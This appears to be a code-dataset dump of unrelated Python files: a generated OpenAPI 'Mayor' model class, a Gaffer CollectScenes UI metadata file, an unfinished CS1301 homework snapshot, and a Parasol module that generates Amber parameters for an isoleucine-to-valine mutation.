:return: The death_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._death_date
@death_date.setter
def death_date(self, death_date):
"""Sets the death_date of this Mayor.
Description not available # noqa: E501
:param death_date: The death_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._death_date = death_date
@property
def special_trial(self):
"""Gets the special_trial of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The special_trial of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._special_trial
@special_trial.setter
def special_trial(self, special_trial):
"""Sets the special_trial of this Mayor.
Description not available # noqa: E501
:param special_trial: The special_trial of this Mayor. # noqa: E501
:type: list[int]
"""
self._special_trial = special_trial
@property
def resting_date(self):
"""Gets the resting_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The resting_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._resting_date
@resting_date.setter
def resting_date(self, resting_date):
"""Sets the resting_date of this Mayor.
Description not available # noqa: E501
:param resting_date: The resting_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._resting_date = resting_date
@property
def victim(self):
"""Gets the victim of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The victim of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._victim
@victim.setter
def victim(self, victim):
"""Sets the victim of this Mayor.
Description not available # noqa: E501
:param victim: The victim of this Mayor. # noqa: E501
:type: list[str]
"""
self._victim = victim
@property
def has_natural_bust(self):
"""Gets the has_natural_bust of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The has_natural_bust of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._has_natural_bust
@has_natural_bust.setter
def has_natural_bust(self, has_natural_bust):
"""Sets the has_natural_bust of this Mayor.
Description not available # noqa: E501
:param has_natural_bust: The has_natural_bust of this Mayor. # noqa: E501
:type: list[str]
"""
self._has_natural_bust = has_natural_bust
@property
def masters_wins(self):
"""Gets the masters_wins of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The masters_wins of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._masters_wins
@masters_wins.setter
def masters_wins(self, masters_wins):
"""Sets the masters_wins of this Mayor.
Description not available # noqa: E501
:param masters_wins: The masters_wins of this Mayor. # noqa: E501
:type: list[object]
"""
self._masters_wins = masters_wins
@property
def individualised_pnd(self):
"""Gets the individualised_pnd of this Mayor. # noqa: E501
PND (Personennamendatei) data about a person. PND is published by the German National Library. For each person there is a record with her/his name, birth and occupation connected with a unique identifier, the PND number. # noqa: E501
:return: The individualised_pnd of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._individualised_pnd
@individualised_pnd.setter
def individualised_pnd(self, individualised_pnd):
"""Sets the individualised_pnd of this Mayor.
PND (Personennamendatei) data about a person. PND is published by the German National Library. For each person there is a record with her/his name, birth and occupation connected with a unique identifier, the PND number. # noqa: E501
:param individualised_pnd: The individualised_pnd of this Mayor. # noqa: E501
:type: list[int]
"""
self._individualised_pnd = individualised_pnd
@property
def continental_tournament_gold(self):
"""Gets the continental_tournament_gold of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The continental_tournament_gold of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._continental_tournament_gold
@continental_tournament_gold.setter
def continental_tournament_gold(self, continental_tournament_gold):
"""Sets the continental_tournament_gold of this Mayor.
Description not available # noqa: E501
:param continental_tournament_gold: The continental_tournament_gold of this Mayor. # noqa: E501
:type: list[int]
"""
self._continental_tournament_gold = continental_tournament_gold
@property
def orientation(self):
"""Gets the orientation of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The orientation of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._orientation
@orientation.setter
def orientation(self, orientation):
"""Sets the orientation of this Mayor.
Description not available # noqa: E501
:param orientation: The orientation of this Mayor. # noqa: E501
:type: list[str]
"""
self._orientation = orientation
@property
def grave(self):
"""Gets the grave of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The grave of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._grave
@grave.setter
def grave(self, grave):
"""Sets the grave of this Mayor.
Description not available # noqa: E501
:param grave: The grave of this Mayor. # noqa: E501
:type: list[str]
"""
self._grave = grave
@property
def resting_place(self):
"""Gets the resting_place of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The resting_place of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._resting_place
@resting_place.setter
def resting_place(self, resting_place):
"""Sets the resting_place of this Mayor.
Description not available # noqa: E501
:param resting_place: The resting_place of this Mayor. # noqa: E501
:type: list[object]
"""
self._resting_place = resting_place
@property
def abbeychurch_blessing_charge(self):
"""Gets the abbeychurch_blessing_charge of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The abbeychurch_blessing_charge of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._abbeychurch_blessing_charge
@abbeychurch_blessing_charge.setter
def abbeychurch_blessing_charge(self, abbeychurch_blessing_charge):
"""Sets the abbeychurch_blessing_charge of this Mayor.
Description not available # noqa: E501
:param abbeychurch_blessing_charge: The abbeychurch_blessing_charge of this Mayor. # noqa: E501
:type: list[str]
"""
self._abbeychurch_blessing_charge = abbeychurch_blessing_charge
@property
def handisport(self):
"""Gets the handisport of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The handisport of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._handisport
@handisport.setter
def handisport(self, handisport):
"""Sets the handisport of this Mayor.
Description not available # noqa: E501
:param handisport: The handisport of this Mayor. # noqa: E501
:type: list[str]
"""
self._handisport = handisport
@property
def external_ornament(self):
"""Gets the external_ornament of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The external_ornament of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._external_ornament
@external_ornament.setter
def external_ornament(self, external_ornament):
"""Sets the external_ornament of this Mayor.
Description not available # noqa: E501
:param external_ornament: The external_ornament of this Mayor. # noqa: E501
:type: list[str]
"""
self._external_ornament = external_ornament
@property
def third(self):
"""Gets the third of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The third of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._third
@third.setter
def third(self, third):
"""Sets the third of this Mayor.
Description not available # noqa: E501
:param third: The third of this Mayor. # noqa: E501
:type: list[int]
"""
self._third = third
@property
def film_number(self):
"""Gets the film_number of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The film_number of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._film_number
@film_number.setter
def film_number(self, film_number):
"""Sets the film_number of this Mayor.
Description not available # noqa: E501
:param film_number: The film_number of this Mayor. # noqa: E501
:type: list[int]
"""
self._film_number = film_number
@property
def temple(self):
"""Gets the temple of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The temple of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._temple
@temple.setter
def temple(self, temple):
"""Sets the temple of this Mayor.
Description not available # noqa: E501
:param temple: The temple of this Mayor. # noqa: E501
:type: list[str]
"""
self._temple = temple
@property
def end_reign(self):
"""Gets the end_reign of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The end_reign of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._end_reign
@end_reign.setter
def end_reign(self, end_reign):
"""Sets the end_reign of this Mayor.
Description not available # noqa: E501
:param end_reign: The end_reign of this Mayor. # noqa: E501
:type: list[object]
"""
self._end_reign = end_reign
@property
def national_tournament_gold(self):
"""Gets the national_tournament_gold of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The national_tournament_gold of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._national_tournament_gold
@national_tournament_gold.setter
def national_tournament_gold(self, national_tournament_gold):
"""Sets the national_tournament_gold of this Mayor.
Description not available # noqa: E501
:param national_tournament_gold: The national_tournament_gold of this Mayor. # noqa: E501
:type: list[int]
"""
self._national_tournament_gold = national_tournament_gold
@property
def death_cause(self):
"""Gets the death_cause of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The death_cause of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._death_cause
@death_cause.setter
def death_cause(self, death_cause):
"""Sets the death_cause of this Mayor.
Description not available # noqa: E501
:param death_cause: The death_cause of this Mayor. # noqa: E501
:type: list[object]
"""
self._death_cause = death_cause
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Mayor):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, Mayor):
return True
return self.to_dict() != other.to_dict()
| [
"[email protected]"
] | |
210ea9a60a611db409d76c3c0405210c78d2cfcc | 2b7cd8141d6c17572c05d4d70e3e616e02449e72 | /python/GafferSceneUI/CollectScenesUI.py | 341298801206215eb7677d5fcea14b99ce048bf9 | [
"BSD-3-Clause"
] | permissive | gray10b/gaffer | 45aefd4ebbf515d5b491777a3bfd027d90715114 | 828b3b59f1154b0a14020cbf9a292c9048c09968 | refs/heads/master | 2021-01-02T09:11:13.137347 | 2017-08-04T05:07:31 | 2017-08-04T05:07:31 | 99,158,553 | 0 | 0 | null | 2017-08-02T20:34:13 | 2017-08-02T20:34:13 | null | UTF-8 | Python | false | false | 3,233 | py | ##########################################################################
#
# Copyright (c) 2017, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import Gaffer
import GafferScene
Gaffer.Metadata.registerNode(
GafferScene.CollectScenes,
"description",
"""
Builds a scene by bundling multiple input scenes together, each
under their own root location. Instead of using an array of inputs
like the Group node, a single input is used instead, and a context
variable is provided so that a different hierarchy can be generated
under each root location. This is especially powerful for building
dynamic scenes where the number of inputs is not known prior to
building the node graph.
Since merging globals from multiple scenes often doesn't make sense,
the output globals are taken directly from the scene corresponding to
`rootNames[0]`.
""",
plugs = {
"rootNames" : [
"description",
"""
The names of the locations to create at the root of
the output scene. The input scene is copied underneath
each of these root locations.
Often the rootNames will be driven by an expression that generates
a dynamic number of root locations, perhaps by querying an asset
management system or listing cache files on disk.
""",
],
"rootNameVariable" : [
"description",
"""
The name of a context variable that is set to the current
root name when evaluating the input scene. This can be used
in upstream expressions and string substitutions to generate
a different hierarchy under each root location.
""",
],
}
)
| [
"[email protected]"
] | |
f2dbfe14a65b0edc19d892ddcc7a57467691b220 | f87f51ec4d9353bc3836e22ac4a944951f9c45c0 | /.history/HW01_20210624144937.py | b9d45c1f373833420f3987ed361ba22bbc6b3abd | [] | no_license | sanjayMamidipaka/cs1301 | deaffee3847519eb85030d1bd82ae11e734bc1b7 | 9ddb66596497382d807673eba96853a17884d67b | refs/heads/main | 2023-06-25T04:52:28.153535 | 2021-07-26T16:42:44 | 2021-07-26T16:42:44 | 389,703,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,177 | py | """
Georgia Institute of Technology - CS1301
HW01 - Functions and Expressions
Collaboration Statement:
"""
#########################################
"""
Function Name: bake()
Parameters: cakes (int), cupcakes (int), cookies (int)
Returns: None
"""
def bake(cakes, cupcakes, cookies):
cake_time = cakes*100 #time in minutes for each cake
cupcakes_time = cupcakes*70 #same as above but for the other items
cookies_time = cookies*45
total_time = cake_time + cupcakes_time + cookies_time #stores the total time used to make all the items
hours = total_time//60 #converts the total minutes into the appropriate amount of hours and minutes
minutes = total_time % 60
print('It will take {} hours and {} minutes to make {} cakes, {} cupcakes, and {} cookies.'.format(hours, minutes, cakes, cupcakes, cookies)) #formats the information and prints out the results
#########################################
"""
Function Name: cakeVolume()
Parameters: radius (int), height (int)
Returns: None
"""
def cakeVolume(radius, height):
volume = 3.14 * radius**2 * height #calculating volume with the volume formula
rounded_volume = round(volume, 2) #rounding my answer to 2 places
print('The volume of the cake is {}.'.format(rounded_volume))
#########################################
"""
Function Name: celebrate()
Parameters: pizzas (int), pastas (int), burgers (int), tipPercent (int)
Returns: None
"""
def celebrate(pizzas, pastas, burgers, tipPercent):
pizzas_price = pizzas*14
pastas_price = pastas*10
burgers_price = burgers*7
total_price = pizzas_price + pastas_price + burgers_price
tip = total_price * (tipPercent/100)
print()
#########################################
"""
Function Name: bookstore()
Parameters: daysBorrowed (int)
Returns: None
"""
def bookstore(daysBorrowed):
pass
#########################################
"""
Function Name: monthlyAllowance()
Parameters: allowance (int), savingsPercentage (int)
Returns: None
"""
def monthlyAllowance(allowance, savingsPercentage):
pass
bake(1, 3, 12)
cakeVolume(5, 8) | [
"[email protected]"
] | |
28ce163f3b9cf5eb8781bca648c833347a56180a | 47b4d76e9c87e6c45bab38e348ae12a60a60f94c | /Mutation_Modules/ILE_VAL.py | 1febf610cbd99aa48137a62bd7106f55e86ea931 | [] | no_license | PietroAronica/Parasol.py | 9bc17fd8e177e432bbc5ce4e7ee2d721341b2707 | 238abcdc2caee7bbfea6cfcdda1ca705766db204 | refs/heads/master | 2021-01-10T23:57:40.225140 | 2020-10-14T02:21:15 | 2020-10-14T02:21:15 | 70,791,648 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,858 | py | # ILE to VAL Mutation
import Frcmod_creator
import PDBHandler
import Leapy
from parmed.tools.actions import *
from parmed.amber.readparm import *
def parmed_command(vxi='VXI', lipid='No'):
bc = {}
with open('Param_files/AminoAcid/ILE.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
key, value = line.split()
bc[key] = float(value)
b.close()
fc = {}
with open('Param_files/AminoAcid/VAL.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
key, value = line.split()
fc[key] = float(value)
b.close()
for i in range(11):
a = i*10
parm = AmberParm('Solv_{}_{}.prmtop'.format(a, 100-a))
changeLJPair(parm, ':{}@HG11'.format(vxi), ':{}@HD11'.format(vxi), '0', '0').execute()
change(parm, 'charge', ':{}@N'.format(vxi), bc['N']+((fc['N']-bc['N'])/10)*i).execute()
change(parm, 'charge', ':{}@H'.format(vxi), bc['H']+((fc['H']-bc['H'])/10)*i).execute()
change(parm, 'charge', ':{}@CA'.format(vxi), bc['CA']+((fc['CA']-bc['CA'])/10)*i).execute()
change(parm, 'charge', ':{}@HA'.format(vxi), bc['HA']+((fc['HA']-bc['HA'])/10)*i).execute()
change(parm, 'charge', ':{}@CB'.format(vxi), bc['CB']+((fc['CB']-bc['CB'])/10)*i).execute()
change(parm, 'charge', ':{}@HB'.format(vxi), bc['HB']+((fc['HB']-bc['HB'])/10)*i).execute()
change(parm, 'charge', ':{}@CG2'.format(vxi), bc['CG2']+((fc['CG2']-bc['CG2'])/10)*i).execute()
change(parm, 'charge', ':{}@HG21'.format(vxi), bc['HG21']+((fc['HG21']-bc['HG21'])/10)*i).execute()
change(parm, 'charge', ':{}@HG22'.format(vxi), bc['HG22']+((fc['HG22']-bc['HG22'])/10)*i).execute()
change(parm, 'charge', ':{}@HG23'.format(vxi), bc['HG23']+((fc['HG23']-bc['HG23'])/10)*i).execute()
change(parm, 'charge', ':{}@CG1'.format(vxi), bc['CG1']+((fc['CG1']-bc['CG1'])/10)*i).execute()
change(parm, 'charge', ':{}@HG11'.format(vxi), (fc['HG11']/10)*i).execute()
change(parm, 'charge', ':{}@HG12'.format(vxi), bc['HG12']+((fc['HG12']-bc['HG12'])/10)*i).execute()
change(parm, 'charge', ':{}@HG13'.format(vxi), bc['HG13']+((fc['HG13']-bc['HG13'])/10)*i).execute()
change(parm, 'charge', ':{}@CD1'.format(vxi), bc['CD1']-(bc['CD1']/10)*i).execute()
change(parm, 'charge', ':{}@HD11'.format(vxi), bc['HD11']-(bc['HD11']/10)*i).execute()
change(parm, 'charge', ':{}@HD12'.format(vxi), bc['HD12']-(bc['HD12']/10)*i).execute()
change(parm, 'charge', ':{}@HD13'.format(vxi), bc['HD13']-(bc['HD13']/10)*i).execute()
change(parm, 'charge', ':{}@C'.format(vxi), bc['C']+((fc['C']-bc['C'])/10)*i).execute()
change(parm, 'charge', ':{}@O'.format(vxi), bc['O']+((fc['O']-bc['O'])/10)*i).execute()
setOverwrite(parm).execute()
parmout(parm, 'Solv_{}_{}.prmtop'.format(a, 100-a)).execute()
def makevxi(struct, out, aa, vxi='VXI'):
struct.residue_dict[aa].set_resname(vxi)
CD1 = struct.residue_dict[aa].atom_dict['CD1']
pdb = open(out, 'w')
try:
pdb.write(struct.other_dict['Cryst1'].formatted())
except KeyError:
pass
for res in struct.residue_list:
for atom in res.atom_list:
if atom.get_name() == 'CG1' and res.get_resname() == vxi:
pdb.write(atom.formatted())
pdb.write(atom.superimposed1('HG11', CD1))
else:
pdb.write(atom.formatted())
try:
pdb.write(struct.other_dict[atom.get_number()].ter())
except:
pass
for oth in struct.other_dict:
try:
if oth.startswith('Conect'):
pdb.write(struct.other_dict[oth].formatted())
except:
pass
pdb.write('END\n')
def variablemake(sym='^'):
var1 = sym + '1'
var2 = sym + '2'
var3 = sym + '3'
var4 = sym + '4'
var5 = sym + '5'
var6 = sym + '6'
var7 = sym + '7'
var8 = sym + '8'
var9 = sym + '9'
var10 = sym + '0'
var11 = sym + 'a'
var12 = sym + 'b'
var13 = sym + 'c'
var14 = sym + 'd'
var15 = sym + 'e'
return var1, var2, var3, var4, var5, var6, var7, var8, var9, var10, var11, var12, var13, var14, var15
def lib_make(ff, outputfile, vxi='VXI', var=variablemake()):
metcar = var[0]
methyd = var[1]
hydhyd = var[2]
ctrl = open('lyp.in', 'w')
ctrl.write("source %s\n"%ff)
ctrl.write("%s=loadpdb Param_files/LibPDB/ILE-VAL.pdb\n"%vxi)
ctrl.write('set %s.1.1 element "N"\n'%vxi)
ctrl.write('set %s.1.2 element "H"\n'%vxi)
ctrl.write('set %s.1.3 element "C"\n'%vxi)
ctrl.write('set %s.1.4 element "H"\n'%vxi)
ctrl.write('set %s.1.5 element "C"\n'%vxi)
ctrl.write('set %s.1.6 element "H"\n'%vxi)
ctrl.write('set %s.1.7 element "C"\n'%vxi)
ctrl.write('set %s.1.8 element "H"\n'%vxi)
ctrl.write('set %s.1.9 element "H"\n'%vxi)
ctrl.write('set %s.1.10 element "H"\n'%vxi)
ctrl.write('set %s.1.11 element "C"\n'%vxi)
ctrl.write('set %s.1.12 element "H"\n'%vxi)
ctrl.write('set %s.1.13 element "H"\n'%vxi)
ctrl.write('set %s.1.14 element "H"\n'%vxi)
ctrl.write('set %s.1.15 element "C"\n'%vxi)
ctrl.write('set %s.1.16 element "H"\n'%vxi)
ctrl.write('set %s.1.17 element "H"\n'%vxi)
ctrl.write('set %s.1.18 element "H"\n'%vxi)
ctrl.write('set %s.1.19 element "C"\n'%vxi)
ctrl.write('set %s.1.20 element "O"\n'%vxi)
ctrl.write('set %s.1.1 name "N"\n'%vxi)
ctrl.write('set %s.1.2 name "H"\n'%vxi)
ctrl.write('set %s.1.3 name "CA"\n'%vxi)
ctrl.write('set %s.1.4 name "HA"\n'%vxi)
ctrl.write('set %s.1.5 name "CB"\n'%vxi)
ctrl.write('set %s.1.6 name "HB"\n'%vxi)
ctrl.write('set %s.1.7 name "CG2"\n'%vxi)
ctrl.write('set %s.1.8 name "HG21"\n'%vxi)
ctrl.write('set %s.1.9 name "HG22"\n'%vxi)
ctrl.write('set %s.1.10 name "HG23"\n'%vxi)
ctrl.write('set %s.1.11 name "CG1"\n'%vxi)
ctrl.write('set %s.1.12 name "HG11"\n'%vxi)
ctrl.write('set %s.1.13 name "HG12"\n'%vxi)
ctrl.write('set %s.1.14 name "HG13"\n'%vxi)
ctrl.write('set %s.1.15 name "CD1"\n'%vxi)
ctrl.write('set %s.1.16 name "HD11"\n'%vxi)
ctrl.write('set %s.1.17 name "HD12"\n'%vxi)
ctrl.write('set %s.1.18 name "HD13"\n'%vxi)
ctrl.write('set %s.1.19 name "C"\n'%vxi)
ctrl.write('set %s.1.20 name "O"\n'%vxi)
ctrl.write('set %s.1.1 type "N"\n'%vxi)
ctrl.write('set %s.1.2 type "H"\n'%vxi)
ctrl.write('set %s.1.3 type "CT"\n'%vxi)
ctrl.write('set %s.1.4 type "H1"\n'%vxi)
ctrl.write('set %s.1.5 type "CT"\n'%vxi)
ctrl.write('set %s.1.6 type "HC"\n'%vxi)
ctrl.write('set %s.1.7 type "CT"\n'%vxi)
ctrl.write('set %s.1.8 type "HC"\n'%vxi)
ctrl.write('set %s.1.9 type "HC"\n'%vxi)
ctrl.write('set %s.1.10 type "HC"\n'%vxi)
ctrl.write('set %s.1.11 type "CT"\n'%vxi)
ctrl.write('set %s.1.12 type "%s"\n'%(vxi, hydhyd))
ctrl.write('set %s.1.13 type "HC"\n'%vxi)
ctrl.write('set %s.1.14 type "HC"\n'%vxi)
ctrl.write('set %s.1.15 type "%s"\n'%(vxi, metcar))
ctrl.write('set %s.1.16 type "%s"\n'%(vxi, methyd))
ctrl.write('set %s.1.17 type "%s"\n'%(vxi, methyd))
ctrl.write('set %s.1.18 type "%s"\n'%(vxi, methyd))
ctrl.write('set %s.1.19 type "C"\n'%vxi)
ctrl.write('set %s.1.20 type "O"\n'%vxi)
ctrl.write('bond %s.1.1 %s.1.2\n'%(vxi, vxi))
ctrl.write('bond %s.1.1 %s.1.3\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.4\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.5\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.19\n'%(vxi, vxi))
ctrl.write('bond %s.1.5 %s.1.6\n'%(vxi, vxi))
ctrl.write('bond %s.1.5 %s.1.7\n'%(vxi, vxi))
ctrl.write('bond %s.1.5 %s.1.11\n'%(vxi, vxi))
ctrl.write('bond %s.1.7 %s.1.8\n'%(vxi, vxi))
ctrl.write('bond %s.1.7 %s.1.9\n'%(vxi, vxi))
ctrl.write('bond %s.1.7 %s.1.10\n'%(vxi, vxi))
ctrl.write('bond %s.1.11 %s.1.12\n'%(vxi, vxi))
ctrl.write('bond %s.1.11 %s.1.13\n'%(vxi, vxi))
ctrl.write('bond %s.1.11 %s.1.14\n'%(vxi, vxi))
ctrl.write('bond %s.1.11 %s.1.15\n'%(vxi, vxi))
ctrl.write('bond %s.1.15 %s.1.16\n'%(vxi, vxi))
ctrl.write('bond %s.1.15 %s.1.17\n'%(vxi, vxi))
ctrl.write('bond %s.1.15 %s.1.18\n'%(vxi, vxi))
ctrl.write('bond %s.1.19 %s.1.20\n'%(vxi, vxi))
ctrl.write('set %s.1 connect0 %s.1.N\n'%(vxi, vxi))
ctrl.write('set %s.1 connect1 %s.1.C\n'%(vxi, vxi))
ctrl.write('set %s name "%s"\n'%(vxi, vxi))
ctrl.write('set %s.1 name "%s"\n'%(vxi, vxi))
ctrl.write('set %s head %s.1.N\n'%(vxi, vxi))
ctrl.write('set %s tail %s.1.C\n'%(vxi, vxi))
ctrl.write('saveoff %s %s.lib\n'%(vxi, vxi))
ctrl.write("quit\n")
ctrl.close()
Leapy.run('lyp.in', outputfile)
def all_make():
for i in range(0,110,10):
Frcmod_creator.make ('{}_{}.frcmod'.format(i, 100-i))
def cal(x, y, i):
num = x+((y-x)/10)*i
return num
def lac(x, y, i):
num = y+((x-y)/10)*i
return num
def stock_add_to_all(var=variablemake()):
metcar = var[0]
methyd = var[1]
hydhyd = var[2]
Frcmod_creator.make_hyb()
Frcmod_creator.TYPE_insert(metcar, 'C', 'sp3')
Frcmod_creator.TYPE_insert(methyd, 'H', 'sp3')
Frcmod_creator.TYPE_insert(hydhyd, 'H', 'sp3')
p = {}
with open('Param_files/Stock/Stock.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
p[line.split()[0]] = []
for point in line.split()[1:]:
p[line.split()[0]].append(float(point))
b.close()
for i in range(11):
a = i*10
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), metcar, cal(p['CT'][0], p['0_C'][0], i), cal(p['CT'][1], p['0_C'][1], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), methyd, cal(p['HC'][0], p['0_H'][0], i), cal(p['HC'][1], p['0_H'][1], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd, cal(p['0_H'][0], p['HC'][0], i), cal(p['0_H'][1], p['HC'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', metcar), cal(p['CT_CT'][0], p['CT_mH'][0], i), cal(p['CT_CT'][1], p['CT_mH'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', hydhyd), cal(p['HC_sC'][0], p['CT_HC'][0], i), cal(p['HC_sC'][1], p['CT_HC'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format(metcar, methyd), cal(p['CT_HC'][0], p['HC_mH'][0], i), cal(p['CT_HC'][1], p['HC_mH'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', metcar, methyd), cal(p['C_C_H'][0], p['Dritt'][0], i), cal(p['C_C_H'][1], p['Dritt'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(methyd, metcar, methyd), cal(p['H_C_H'][0], p['Close'][0], i), cal(p['H_C_H'][1], p['Close'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', metcar), cal(p['C_C_C'][0], p['C_C_C'][0], i), cal(p['C_C_C'][1], p['C_C_C'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('HC', 'CT', metcar), cal(p['C_C_H'][0], p['C_C_H'][0], i), cal(p['C_C_H'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('HC', 'CT', hydhyd), cal(p['H_C_H'][0], p['H_C_H'][0], i), cal(p['H_C_H'][1], p['H_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(hydhyd, 'CT', metcar), cal(p['Close'][0], p['Close'][0], i), cal(p['Close'][1], p['Close'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', hydhyd), cal(p['C_C_H'][0], p['C_C_H'][0], i), cal(p['C_C_H'][1], p['C_C_H'][1], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', 'CT', metcar, methyd), cal(p['C_C_C_H'][0], p['0_1'][0], i), cal(p['C_C_C_H'][1], p['0_1'][1], i), cal(p['C_C_C_H'][2], p['0_1'][2], i), cal(p['C_C_C_H'][3], p['0_1'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('HC', 'CT', metcar, methyd), cal(p['H_C_C_H'][0], p['0_1'][0], i), cal(p['H_C_C_H'][1], p['0_1'][1], i), cal(p['H_C_C_H'][2], p['0_1'][2], i), cal(p['H_C_C_H'][3], p['0_1'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(hydhyd, 'CT', metcar, methyd), cal(p['0_Dihe'][0], p['0_Dihe'][0], i), cal(p['0_Dihe'][1], p['0_Dihe'][1], i), cal(p['0_Dihe'][2], p['0_Dihe'][2], i), cal(p['0_Dihe'][3], p['0_Dihe'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), metcar, cal(p['CT'][2], p['0_C'][2], i), cal(p['CT'][3], p['0_C'][3], i))
